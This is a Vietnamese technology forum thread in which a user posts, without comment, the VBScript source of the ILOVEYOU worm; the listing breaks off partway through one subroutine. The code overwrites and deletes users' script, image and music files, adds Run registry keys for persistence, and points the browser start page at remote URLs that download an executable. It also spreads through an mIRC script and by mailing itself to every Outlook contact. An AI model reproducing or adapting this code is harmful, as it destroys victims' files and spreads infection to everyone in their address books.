Bạn ghé thăm diễn đàn lần đầu? hãy đăng ký ngay bây giờ để tham gia.
 • Đăng nhập:

Chào mừng bạn đến với ITVNN FORUM - Diễn đàn công nghệ thông tin.

Nếu đây là lần đầu tiên bạn tham gia diễn đàn, xin mời bạn xem phần Hỏi/Ðáp để biết cách dùng diễn đàn. Để có thể tham gia thảo luận bạn phải đăng ký làm thành viên, click vào đây để đăng ký.


 • Partner Area
  • Chương trình khuyến mãi khi chuyển dịch vụ về 123HOST Việt Nam Anh Hùng - Thông tin truyền thông
kết quả từ 1 tới 1 trên 1

Ðề tài: Source virus i love u

Tăng kích thước phông chữ Giảm kích thước phông chữ
 1. #1
  80A-8888's Avatar

  Trạng thái
  Offline
  Tham gia ngày
  Oct 2009
  Thành viên thứ
  1844
  Tuổi
  33
  Giới tính
  Bài gởi
  37
  Level: 29 [?]
  Experience: 199,577
  Next Level: 242,754
  Cảm ơn 0
  Cảm ơn 1 lần / 1 Bài viết

  Icon17 Source virus i love u  

  Source virus i love u

  Code: 
  On Error Resume Next
  Dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
  Eq=""
  Ctr=0
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
  Vbscopy=file.ReadAll
  Main()
  sub Main()
  On Error Resume Next
  Dim wscr,rr
  Set wscr=CreateObject("WScript.Shell")
  Rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
  Host\Settings\Timeout")
  If (rr>=1) then
  Wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
  Host\Settings\Timeout",0,"REG_DWORD"
  End if
  Set dirwin = fso.GetSpecialFolder(0)
  Set dirsystem = fso.GetSpecialFolder(1)
  Set dirtemp = fso.GetSpecialFolder(2)
  Set c = fso.GetFile(WScript.ScriptFullName)
  C.Copy(dirsystem&"\MSKernel32.vbs")
  C.Copy(dirwin&"\Win32DLL.vbs")
  C.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  Regruns()
  Html()
  Spreadtoemail()
  
  Listadriv()
  End sub
  sub Regruns()
  On Error Resume Next
  Dim num,downread
  Regcreate
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
  ",dirsystem&"\MSKernel32.vbs"
  Regcreate
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
  N32DLL",dirwin&"\Win32DLL.vbs"
  Downread=""
  Downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
  Explorer\Download Directory")
  If (downread="") then
  Downread="c:\"
  End if
  If (fileexist(dirsystem&"\WinFAT32.exe")=1) then
  Randomize
  Num = Int((4 * Rnd) + 1)
  If num = 1 then
  Regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
  W6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
  Elseif num = 2 then
  Regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
  546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
  Elseif num = 3 then
  Regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
  POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
  Elseif num = 4 then
  Regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
  Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
  YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
  .exe"
  End if
  End if
  If (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
  Regcreate
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
  X",downread&"\WIN-BUGSFIX.exe"
  Regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
  Page","about:blank"
  End if
  End sub
  Sub listadriv
  On Error Resume Next
  Dim d,dc,s
  Set dc = fso.Drives
  For Each d in dc
  If d.DriveType = 2 or d.DriveType=3 Then
  Folderlist(d.path&"\")
  End if
  Next
  Listadriv = s
  End sub
  Sub infectfiles(folderspec)
  On Error Resume Next
  Dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
  Set f = fso.GetFolder(folderspec)
  Set fc = f.Files
  For each f1 in fc
  Ext=fso.GetExtensionName(f1.path)
  Ext=lcase(ext)
  S=lcase(f1.name)
  If (ext="vbs") or (ext="vbe") then
  Set ap=fso.OpenTextFile(f1.path,2,true)
  Ap.write vbscopy
  Ap.close
  Elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
  Or (ext="hta") then
  Set ap=fso.OpenTextFile(f1.path,2,true)
  Ap.write vbscopy
  Ap.close
  Bname=fso.GetBaseName(f1.path)
  Set cop=fso.GetFile(f1.path)
  Cop.copy(folderspec&"\"&bname&".vbs")
  Fso.DeleteFile(f1.path)
  Elseif(ext="jpg") or (ext="jpeg") then
  Set ap=fso.OpenTextFile(f1.path,2,true)
  Ap.write vbscopy
  Ap.close
  Set cop=fso.GetFile(f1.path)
  Cop.copy(f1.path&".vbs")
  Fso.DeleteFile(f1.path)
  Elseif(ext="mp3") or (ext="mp2") then
  Set mp3=fso.CreateTextFile(f1.path&".vbs")
  Mp3.write vbscopy
  Mp3.close
  Set att=fso.GetFile(f1.path)
  Att.attributes=att.attributes+2
  End if
  If (eq<>folderspec) then
  If (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
  (s="script.ini") or (s="mirc.hlp") then
  Set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
  Scriptini.WriteLine "[script]"
  Scriptini.WriteLine ";mIRC Script"
  Scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
  If mIRC will"
  Scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
  Correctly. thanks"
  Scriptini.WriteLine ";"
  Scriptini.WriteLine ";Khaled Mardam-Bey"
  Scriptini.WriteLine ";http://www.mirc.com"
  Scriptini.WriteLine ";"
  Scriptini.WriteLine "n0=on 1:JOIN:#:{"
  Scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
  Scriptini.WriteLine "n2= /.dcc send $nick
  "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
  Scriptini.WriteLine "n3=}"
  Scriptini.close
  Eq=folderspec
  End if
  End if
  Next
  End sub
  Sub folderlist(folderspec)
  On Error Resume Next
  Dim f,f1,sf
  Set f = fso.GetFolder(folderspec)
  Set sf = f.SubFolders
  For each f1 in sf
  Infectfiles(f1.path)
  Folderlist(f1.path)
  Next
  End sub
  Sub regcreate(regkey,regvalue)
  Set regedit = CreateObject("WScript.Shell")
  Regedit.RegWrite regkey,regvalue
  End sub
  Function regget(value)
  Set regedit = CreateObject("WScript.Shell")
  Regget=regedit.RegRead(value)
  End function
  Function fileexist(filespec)
  On Error Resume Next
  Dim msg
  If (fso.FileExists(filespec)) Then
  Msg = 0
  Else
  Msg = 1
  End if
  Fileexist = msg
  End function
  Function folderexist(folderspec)
  On Error Resume Next
  Dim msg
  If (fso.GetFolderExists(folderspec)) then
  Msg = 0
  Else
  Msg = 1
  End if
  Fileexist = msg
  End function
  Function folderexist(folderspec)
  On Error Resume Next
  Dim msg
  If (fso.GetFolderExists(folderspec)) then
  Msg = 0
  Else
  Msg = 1
  End if
  Fileexist = msg
  End function
  sub Spreadtoemail()
  On Error Resume Next
  Dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
  Set regedit=CreateObject("WScript.Shell")
  Set out=WScript.CreateObject("Outlook.Application")
  Set mapi=out.GetNameSpace("MAPI")
  For ctrlists=1 to mapi.AddressLists.Count
  Set a=mapi.AddressLists(ctrlists)
  X=1
  Regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
  If (regv="") then
  Regv=1
  End if
  If (int(a.AddressEntries.Count)>int(regv)) then
  For ctrentries=1 to a.AddressEntries.Count
  Malead=a.AddressEntries(x)
  Regad=""
  Regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
  If (regad="") then
  Set male=out.CreateItem(0)
  Male.Recipients.Add(malead)
  Male.Subject = "ILOVEYOU"
  Male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
  Male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  Male.Send
  Regedit.RegWrite
  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
  End if
  X=x+1
  Next
  Regedit.RegWrite
  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
  Else
  Regedit.RegWrite
  "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
  End if
  Next
  Set out=Nothing
  Set mapi=Nothing
  End sub
  Sub html
  On Error Resume Next
  Dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
  Dta1=""&vbcrlf& _
  ""&vbcrlf& _
  ""&vbcrlf& _
  ""&vbcrlf& _


 

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

 1. Trả lời: 0
  Bài mới gởi: 20-11-2019, 05:22 AM
 2. Trả lời: 1
  Bài mới gởi: 25-11-2017, 10:58 AM
 3. [Love] a little love
  By hoangduykt7990 in forum Tán gẫu
  Trả lời: 0
  Bài mới gởi: 23-07-2011, 12:17 AM
 4. Phần mềm diệt virus Kaspersky Anti-Virus
  By vipxinh9x in forum Phần mềm
  Trả lời: 0
  Bài mới gởi: 22-02-2011, 01:52 PM
 5. Trả lời: 0
  Bài mới gởi: 18-09-2009, 06:51 PM

Tags for this Thread

Bookmarks

Quuyền Hạn Của Bạn

 • Bạn không thể tạo chủ đề mới
 • Bạn không thể trả lời bài viết
 • Bạn không thể gửi file đính kèm
 • Bạn không thể chỉnh sửa bài viết
 •